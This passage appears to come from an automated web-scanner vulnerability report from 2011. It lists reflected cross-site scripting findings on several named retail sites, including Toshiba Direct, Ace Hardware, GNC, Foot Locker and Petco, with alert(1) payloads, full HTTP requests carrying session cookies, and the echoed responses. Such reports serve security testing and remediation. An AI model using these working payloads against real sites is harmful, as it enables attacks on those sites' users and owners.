The value of the UniqueItemId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b89"style%3d"x%3aexpression(alert(1))"588742d80ce was submitted in the UniqueItemId parameter. This input was echoed as 97b89"style="x:expression(alert(1))"588742d80ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Shopper/Product.aspx?UniqueItemId=46497b89"style%3d"x%3aexpression(alert(1))"588742d80ce HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.1.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:24:30 GMT
Content-Length: 57128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<a href="http://www.redcrossstore.org/Shopper/Product.aspx?UniqueItemId=46497b89"style="x:expression(alert(1))"588742d80ce" class="breadcrumbs">
...[SNIP]...

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d835f'-alert(1)-'82064d64928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 297415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
ults('searchResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_Use
...[SNIP]...

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc89'-alert(1)-'b678a22fbfb was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 296785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
hResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&targ
...[SNIP]...

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cbd"><script>alert(1)</script>8eeef5c5ccb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:10 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:17 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=lawng319;u1=;u2=2;u3=;u4=2568444;u5=http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb;ord=1;num=96780812?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>2efdd8e8816 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}
Referer: http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816;ord=1;num=81155747?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd5a"><script>alert(1)</script>3de0fcd614 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217
Referer: http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:42 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114272


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614;u6=;u7=;ord=1;num=38799404?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the TID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d25d0"><script>alert(1)</script>eb65c43451a was submitted in the TID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0d25d0"><script>alert(1)</script>eb65c43451a

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:58:54 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:58:54 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0d25d0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeb65c43451a;expires=Sun, 14-Aug-2011 10:58:54 GMT;path=/
Content-Length: 3661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form name="gotoRegistration" id="frmGotoRegistration" action="https://www.footlocker.com/account/default.cfm?TID=5555-37151120432137200525561-0d25d0"><script>alert(1)</script>eb65c43451a&action=accountCreate" METHOD="POST" TARGET="_parent">
...[SNIP]...

5.76. http://www.petco.com/ [ResonanceSegment cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.petco.com
Path:   /

Issue detail

The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 61c9e(a)c8b8ba6952f was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=261c9e(a)c8b8ba6952f; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:57:37 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:57:37 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:57:37 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:57:37 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:57:37 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<script type='text/javascript'>var certonaSegment = 261c9e(a)c8b8ba6952f;var resx = new Object();resx.appid='petco01';resx.top1=33333;resx.top2=66666;resx.top3=100000;resx.lkmatch=/product\/\d+|sku%3D\d+/i;resx.rrelem='home_rr';resx.customerid='256672559073194';</script>
...[SNIP]...

6. Flash cross-domain policy
There are 87 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

